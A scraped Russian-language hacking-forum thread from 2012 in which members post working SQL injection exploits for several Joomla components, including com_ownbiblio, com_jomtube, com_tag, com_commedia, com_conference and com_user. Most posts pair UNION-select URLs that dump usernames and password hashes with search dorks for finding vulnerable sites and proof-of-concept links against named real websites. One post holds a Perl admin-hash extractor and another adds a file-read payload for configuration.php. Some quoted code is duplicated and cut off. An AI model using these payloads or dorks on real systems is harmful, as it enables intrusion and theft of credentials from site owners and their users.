HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #261  
Старый 26.09.2012, 23:40
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Joomla "com_ownbiblio" component SQL Injection

Уязвим параметр catid

Эксплyатация:

Код:
Code:
index.php?option=com_ownbiblio&catid=-1+union+select+1,2,3,concat(username,0x3a,password,0x3a,usertype),5,6,7,8,9,0,11,12,13,14,15,16,17+from+jos_users+--+
количество калонок может меняться!

POC:

Цитата:
Сообщение от None  
http://www.wisdomtherapy.com/index.php?option=com_ownbiblio&catid=-1+union+select+1,2,3,concat%28user%28%29,version%2 8%29,database%28%29%29,5,6,7,8,9,0,11,12,13,14,15, 16,17+from+jos_users+--+&Itemid=0&year=All&search=&page=2&view=catalogu e
Дорк: "inurl:com_ownbiblio catid"

Уязвимый код:

сomponents/com_ownbiblio/models/ownbiblio.php

[QUOTE="None"]
function getCategoryByID($ID)
{
$query = "
SELECT
* FROM #__ownbiblio_categories WHERE ID =".
$ID
;
$category = $this->_getList($query);
return $category[0];
}
[ ... ]
function _getEntrysQuery($year = 'All', $catid = 0, $start, $end,$search = null, $ob_untilyear = null){
$query = "
SELECT
* FROM #__ownbiblio WHERE catid = " .
$catid
;
$limit = $ob_untilyear;
if($search){
$query .= " AND (tname LIKE '
%$search%
' OR ttitle LIKE '
%$search%
' OR tjourn LIKE '
%$search%
' OR tdate LIKE '
%$search%
' OR tdesc LIKE '
%$search%
' OR tkeys LIKE '
%$search%
')";
} elseif($year != 'All' && $year != 'Other'){
$query .= " AND tdate like '%" . $year . "%'";
} elseif($year == 'Other' && $ob_untilyear != null){
$query .= " AND tdate _getList($query);
return $category[0];
}
[ ... ]
function _getEntrysQuery($year = 'All', $catid = 0, $start, $end,$search = null, $ob_untilyear = null){
$query = "
SELECT
* FROM #__ownbiblio WHERE catid = " .
$catid
;
$limit = $ob_untilyear;
if($search){
$query .= " AND (tname LIKE '
%$search%
' OR ttitle LIKE '
%$search%
' OR tjourn LIKE '
%$search%
' OR tdate LIKE '
%$search%
' OR tdesc LIKE '
%$search%
' OR tkeys LIKE '
%$search%
')";
} elseif($year != 'All' && $year != 'Other'){
$query .= " AND tdate like '%" . $year . "%'";
} elseif($year == 'Other' && $ob_untilyear != null){
$query .= " AND tdate
 
Ответить с цитированием

  #262  
Старый 19.10.2012, 21:24
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Joomla "com_jomtube" component SQL Injection

Уязвим параметр user_id

Эксплyатация:

Код:
Code:
index.php?view=videos&type=member&user_id=[ID юзера] and 1=0 union select 1,2,3,4,5,6,7,8,concat(username,0x3a,password,0x3a,usertype),0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from jos_users limit 0,5 -- &option=com_jomtube
user_id - должен быть существующий!

POC:

Цитата:
Сообщение от None  
http://www.mbrrealty.com.au/index.php?view=videos&type=member&user_id=63%20and %201=0%20union%20select%201,2,3,4,5,6,7,8,9,0,11,1 2,concat_ws%280x3a,user%28%29,version%28%29,databa se%28%29%29,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27%20--%20&option=com_jomtube
Дорк: "inurl:com_jomtube"

Уязвимый код:

components/com_jomtube/models/video.php

Пару моментов, все приводить не буду:

Цитата:
Сообщение от None  
$where
= ' WHERE v.id = ' .
$this->_id
;
$join = ' LEFT JOIN #__users AS u ON u.id = v.user_id';
$select = ' v.*, u.name, u.username';
if ($c->community == 'JomSocial') {
$join.= ' LEFT JOIN #__community_users AS p ON p.userid =
v.user_id
';
$select.= ', p.avatar';
}
$select .= ', c.directory, c.family_id, c.category_name';
$join .= ' JOIN #__jomtube_categories AS c ON c.id = v.category_id';
$query = '
SELECT ' . $select . ' FROM #__jomtube_videos AS v ' . $join . $where
;
[ ... ]
function getVideosincategory() {
$query = 'SELECT v.*, c.directory, u.username, c.category_name, u.id as userid '
. ' FROM #__jomtube_videos AS v '
. ' LEFT JOIN #__users AS u ON
v.user_id = u.id
'
. ' JOIN #__jomtube_categories AS c ON c.id = v.category_id'
. ' WHERE v.category_id = '.$this->_data->category_id
. ' AND v.id != ' .
$this->_id
. ' AND v.published = 1 '
. ' ORDER BY v.date_added DESC'
. ' LIMIT 20'
;
$this->_db->setQuery($query);
return $this->_db->loadObjectList();
P.S:Уязвимость старая и давно есть в паблике, как сегодня убедился до сих пор актуальна.

http://www.exploit-db.com/exploits/14434/
 
Ответить с цитированием

  #263  
Старый 19.10.2012, 21:33
Unknown
Guest
Сообщений: n/a
Провел на форуме:
28262

Репутация: 23
По умолчанию

Joomla tag Remote Sql Exploit

dork: inurl:index.php?option=com_tag

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]#!/usr/bin/perl -w

[/COLOR][COLOR="#007700"]print[/COLOR][COLOR="#DD0000"]"\t\t\n\n"[/COLOR][COLOR="#007700"];

print[/
COLOR][COLOR="#DD0000"]"\t\n"[/COLOR][COLOR="#007700"];

print[/
COLOR][COLOR="#DD0000"]"\t \n"[/COLOR][COLOR="#007700"];

print[/
COLOR][COLOR="#DD0000"]"\t Joomla com_tag Remote Sql Exploit \n"[/COLOR][COLOR="#007700"];

print[/
COLOR][COLOR="#DD0000"]"\t\n\n"[/COLOR][COLOR="#007700"];

use[/
COLOR][COLOR="#0000BB"]LWP[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]UserAgent[/COLOR][COLOR="#007700"];

print[/
COLOR][COLOR="#DD0000"]"\nExample:[http://wwww.site.com/]: "[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]chomp[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]my $target[/COLOR][COLOR="#007700"]=);

[/
COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"username"[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"password"[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"jos_users"[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$d4n[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"com_tag&task"[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$b[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]LWP[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]UserAgent[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]new[/COLOR][COLOR="#007700"]() or die[/COLOR][COLOR="#DD0000"]"Could not initialize browser\n"[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$b[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]agent[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$target[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"index.php?option="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$d4n[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"&tag=999999.9' union all select 1,concat(0x3c757365723e,"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]",0x3c757365723e3c706173733e,"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pass[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]",0x3c706173733e)+from "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"--+a"[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$b[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]request[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]HTTP[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Request[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]new[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]GET[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]));

[/
COLOR][COLOR="#0000BB"]$answer[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"];

if ([/COLOR][COLOR="#0000BB"]$answer[/COLOR][COLOR="#007700"]=~ /(.*?)/){

print[/
COLOR][COLOR="#DD0000"]"\nLos Information for site:\n"[/COLOR][COLOR="#007700"];

print[/
COLOR][COLOR="#DD0000"]"\n

* Admin User : $1"
[/COLOR][COLOR="#007700"];

}

if ([/COLOR][COLOR="#0000BB"]$answer[/COLOR][COLOR="#007700"]=~/(.*?)/){print[/COLOR][COLOR="#DD0000"]"\n

* Admin Hash : $1\n\n"
[/COLOR][COLOR="#007700"];

print[/
COLOR][COLOR="#DD0000"]"\t\t# Exploit finished #\n\n"[/COLOR][COLOR="#007700"];}

else{print[/
COLOR][COLOR="#DD0000"]"\n[-] Exploit Failed...\n"[/COLOR][COLOR="#007700"];}

[/
COLOR][/COLOR
 
Ответить с цитированием

  #264  
Старый 14.11.2012, 22:24
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Joomla "com_commedia" component SQL Injection

Уязвим параметр id

Эксплyатация:

Код:
Code:
index.php?option=com_commedia&format=raw&task=down&pid=124&id=2238+and+1=0+union+select+concat%28username,0x3a,password,0x3a,usertype%29,2+from+jos_users+where+usertype+like+0x2561646D696E6973747261746F7225+limit+0,1+--+
POC:

Цитата:
Сообщение от None  
http://www.radiodan[google]cemusic.com/index.php?option=com_commedia&format=raw&task=down &pid=124%27+and+1=0&id=2238+and+1=0+union+select+c oncat%28username,0x3a,password,0x3a,usertype%29,2+ from+jos_users+where+usertype+like+0x2561646D696E6 973747261746F7225+limit+1,1+--+
Дорк: "inurl:com_commedia id"

Уязвимый код:

components/com_commedia/models/file.php

Цитата:
Сообщение от None  
function DownFile($image=false/*может картинка нужна?*/) {
include_once(JPATH_SITE.DS."components".DS."com_co mmedia".DS."classes".DS."functions.php");
$db =& JFactory::getDBO();
$db->setQuery("SELECT * FROM #__commedia_settings");
$commsett = $db->loadAssocList('name');
//кодировка файловой системы
$fnames_encoding = comm_getencoding($commsett['fnames_encoding']['value']);
$db->setQuery("SELECT CONCAT(path,'/',name) as path, name
FROM `#__commedia` as c, `#__commedia_path` as cp
WHERE c.rowid=".
$_REQUEST['id']
." and cp.path_id=".
$_REQUEST['pid']
);
if (!$db->query()) $path = ''; //если не удалось выполнить, значит запретим доступ
else {
$line=$db->loadObject();
if(!$line) $path = ''; //если ничего не найдено
else {
if (strpos($line->path,'ftp://') === 0) $ftphttp = 1; //для фтп пути отдельно
else if (strpos($line->path,'http://') === 0) $ftphttp = 2; //для http пути отдельно
else {
$ftphttp = 0;
$file = JPATH_SITE.DS.str_replace('/',DS,iconv('UTF-8', $fnames_encoding,$line->path));
if ($image=='1') $file = substr($file,0,-4).'.jpg';
else if ($image=='2') $file = substr($file,0,-4).'_thumb.jpg';
}
$name = $line->name;
}
}
P.S: "_ttp://www.explo[google]it-db.com/exploits/22152/"
 
Ответить с цитированием

  #265  
Старый 14.11.2012, 22:55
KolosJey
Новичок
Регистрация: 21.12.2009
Сообщений: 0
Провел на форуме:
15756

Репутация: 0
По умолчанию

Цитата:
Сообщение от winstrool  
winstrool said:
Joomla "com_commedia" component SQL Injection
Уязвим параметр
id
Эксплyатация:
Код:
Code:
index.php?option=com_commedia&format=raw&task=down&pid=124&id=2238+and+1=0+union+select+concat%28username,0x3a,password,0x3a,usertype%29,2+from+jos_users+where+usertype+like+0x2561646D696E6973747261746F7225+limit+0,1+--+
POC:
Дорк:
"inurl:com_commedia id"
Уязвимый код:
components/com_commedia/models/file.php
P.S: "_ttp://www.explo[google]it-db.com/exploits/22152/"
Если не просто копипастить баги и совать кавычки, а хотя бы 10 секунд посмотреть в код, станет очевидно, что там ещё и чтение файлов.

Как там у хакеров? 0day pRiv8

index.php?option=com_commedia&format=raw&task=down &pid=124&id=2238+and+1=0+union+select+0x2e2f636f6e 66696775726174696f6e2e706870,2--+
 
Ответить с цитированием

  #266  
Старый 14.11.2012, 23:04
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от KolosJey  
KolosJey said:
Если не просто копипастить баги и совать кавычки, а хотя бы 10 секунд посмотреть в код, станет очевидно, что там ещё и чтение файлов.
Как там у хакеров? 0day pRiv8
index.php?option=com_commedia&format=raw&task=down &pid=124&id=2238+and+1=0+union+select+0x2e2f636f6e 66696775726174696f6e2e706870,2--+
Моя цель была раскрыть сам уязвимый код, а не копипаст! на счет чтения файлов я тоже видел, но еще пока не проверил...
 
Ответить с цитированием

  #267  
Старый 21.11.2012, 20:01
Unknown
Guest
Сообщений: n/a
Провел на форуме:
42706

Репутация: 6
По умолчанию

Joomla "com_conference" SQL Injection

Уязвим параметр ID

Эксплуатация:

Код:
Code:
/index.php?option=com_conference&task=show&id=999999.9 /*!UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e),0x31303235343830303536,0x31303235343830303536*/--
 
Ответить с цитированием

  #268  
Старый 18.12.2012, 01:44
Unknown
Guest
Сообщений: n/a
Провел на форуме:
28262

Репутация: 23
По умолчанию

Сканер joomla сайта​


Появился новый проект - c0lips.ru, здесь вы можете проверить свой сайт на наличие уязвимых компонентах, посмотреть советы по устранению уязвимостей, посмотреть уязвимый код компонента и уже исправленный код.

Для актуализации проекта, прошу добавлять свои уязвимости по адресу: тык
 
Ответить с цитированием

  #269  
Старый 20.12.2012, 21:49
grimnir
Guest
Сообщений: n/a
Провел на форуме:
216062

Репутация: 231
По умолчанию

Joomla All v1.5 Error Based SQL Injection Vulnerability

Joomla Component com_user

####

# Exploit Title: Joomla All v1.5 Error Based SQL Injection Vulnerability

# Author: Caddy-Dz

# Facebook Page: https://www.facebook.com/Algerian.Cyber.Army

# E-mail: islam_babia@hotmail.com

# Category:: webapps

# script home : http://joomla.com

# Dork : inurlption=com_user

# Security Risk: critical

# Tested on: Back|Track 5 KDE / French

####

# this was written for educational purpose only. use it at your own risk.

# author will be not responsible for any damage caused! user assumes all responsibility

# intended for authorized web application pentesting only!

// Description :

the affected component is /com_user/ in all joomla v1.5

P.S : you could know the version by openning the source code of the target and searching for "joomla" you'll see the version

// Exploit :

http://site.com/index.php?option=com_user&view=reset&lang=en&Itemi d=1+(sql injection)

http://site.com/index.php?option=com_user&view=reset&lang=en&Itemi d=x+(sql injection) [replacing id number by character]

# priv8 youtube link, just people who has the link could view :

http://www.youtube.com/watch?v=g0QcjxIb68I

// Demo :

http://www.lyceeairbus.com/index.php?option=com_user&view=reset&lang=en&Itemi d=1'

http://www.silviajewelry.com/index.php?option=com_user&view=reset&Itemid='

http://www.bklogisticsvn.com/index.php?option=com_user&view=reset&lang=en&Itemi d='

http://algeria.ch/index.php?option=com_user&view=reset&lang=en&Itemi d='

http://www.emissary.com/index.php?option=com_user&view=reset&lang=en&Itemi d='

http://lookdezine.com/main/index.php?option=com_user&view=reset&lang=en&Itemi d='

# Greets To : ================================================== ============================

# The Algerian Cyber Army Team , KedAns-Dz , Klashincov3 , Kha&Mix , King Of Pirates ,

# D4NB4R , Inj3ct0r Team , jos_ali_joe , exploit-id team , OWASP Algeria

# ... And All Algerian Hax0rs

================================================== ==========================================

# 1337day.com [2012-12-12][/quote]
 
Ответить с цитированием

  #270  
Старый 22.12.2012, 12:57
po[w]er
Guest
Сообщений: n/a
Провел на форуме:
11028

Репутация: 0
По умолчанию

Цитата:
Сообщение от Zed0x  
Zed0x said:
Сканер joomla сайта​

Появился новый проект -
c0lips.ru
, здесь вы можете проверить свой сайт на наличие уязвимых компонентах, посмотреть советы по устранению уязвимостей, посмотреть уязвимый код компонента и уже исправленный код.
Для актуализации проекта, прошу добавлять свои уязвимости по адресу:
тык
отличный
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей в форумных движках] Grey Уязвимости CMS / форумов 49 02.04.2015 17:48
Обзор бесплатных Cms em00s7 PHP 16 03.07.2009 13:13
Cms Cawabunga PHP 20 05.08.2007 00:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ